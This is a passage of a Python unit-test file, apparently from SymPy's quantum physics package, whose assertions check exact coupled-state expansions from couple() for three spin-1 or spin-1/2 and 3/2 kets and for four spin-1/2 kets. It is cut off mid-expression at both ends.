couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)), ((1, 3), (1, 2)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
- JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 6
- JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)), ((1, 3), (1, 2)))
== -JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
- sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
- JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 0)), ((1, 3), (1, 2)))
== -sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
- 2 * sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 15
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 5
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)), ((1, 3), (1, 2)))
== -JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
- sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
+ JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)), ((1, 3), (1, 2)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
- JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 6
+ JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 0)), ((1, 3), (1, 2)))
== -sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 15
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, -1)), ((1, 3), (1, 2)))
== sqrt(2) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)), ((1, 3), (1, 2)))
== sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
+ JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 30
- JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)), ((1, 3), (1, 2)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
+ JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 6
- JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, -1)), ((1, 3), (1, 2)))
== sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 5
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)), ((1, 3), (1, 2)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
+ sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
- sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 15
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 3
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)), ((1, 3), (1, 2)))
== JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
- sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
- JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, -1)), ((1, 3), (1, 2)))
== -sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)), ((1, 3), (1, 2)))
== sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
- JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 30
- JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 0)), ((1, 3), (1, 2)))
== -sqrt(2) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert couple(
TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, -1)), ((1, 3), (1, 2))
) == JzKetCoupled(3, -3, (1, 1, 1), ((1, 3, 2), (1, 2, 3)))
# j1=1/2, j2=1/2, j3=3/2
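# As above, the ((1, 3), (1, 2)) argument couples j1 to j3 first and then
# couples that result to j2; the intermediate and total values appear as
# ((1, 3, j13), (1, 2, j)) in the coupled kets below.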
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(3, 2)),
),
((1, 3), (1, 2)),
) == JzKetCoupled(
Rational(5, 2),
Rational(5, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), S.Half),
),
((1, 3), (1, 2)),
)
== JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
- sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(15)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-3, 2)),
),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 2
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
- sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(3, 2)),
),
((1, 3), (1, 2)),
)
== 2
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), S.Half),
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 6
+ 3
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-3, 2)),
),
((1, 3), (1, 2)),
)
== sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(3, 2)),
),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), S.Half),
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 6
- 3
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-3, 2)),
),
((1, 3), (1, 2)),
)
== -2
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(3, 2)),
),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 2
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
+ sqrt(15)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), S.Half),
),
((1, 3), (1, 2)),
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
- sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== -JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 2
+ sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(3, 2))),
)
/ 10
+ sqrt(15)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-3, 2)),
),
((1, 3), (1, 2)),
) == JzKetCoupled(
Rational(5, 2),
Rational(-5, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 3, 2), (1, 2, Rational(5, 2))),
)


def test_couple_4_states_numerical():
# Default coupling
# j1=1/2, j2=1/2, j3=1/2, j4=1/2
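# With no coupling scheme given, couple() uses the default ordering:
# j1 is coupled to j2, that result to j3, then to j4, giving
# ((1, 2, j12), (1, 3, j123), (1, 4, j)) entries in the coupled kets below.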
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
) == JzKetCoupled(
2,
2,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== sqrt(3)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 2
+ JzKetCoupled(
2,
1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== sqrt(6)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 3
- sqrt(3)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
== sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 3
+ sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
== sqrt(2)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
- sqrt(6)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
- sqrt(3)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 0)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 6
+ JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== -JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 0)),
)
/ 2
- sqrt(3)
* JzKetCoupled(
0,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 0)),
)
/ 6
+ JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
+ sqrt(3)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
- sqrt(6)
* JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
2,
0,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
-1,
(S.Half, S(1) / 2, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 2)),
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
== -sqrt(2)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half), (1, 4, 1)),
)
/ 2
- sqrt(6)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half), (1, 4, 1)),
)
/ 6
- sqrt(3)
* JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, 1)),
)
/ 6
+ JzKetCoupled(
2,
1,
(S.Half, S(1) / 2, S.Half, S.Half),
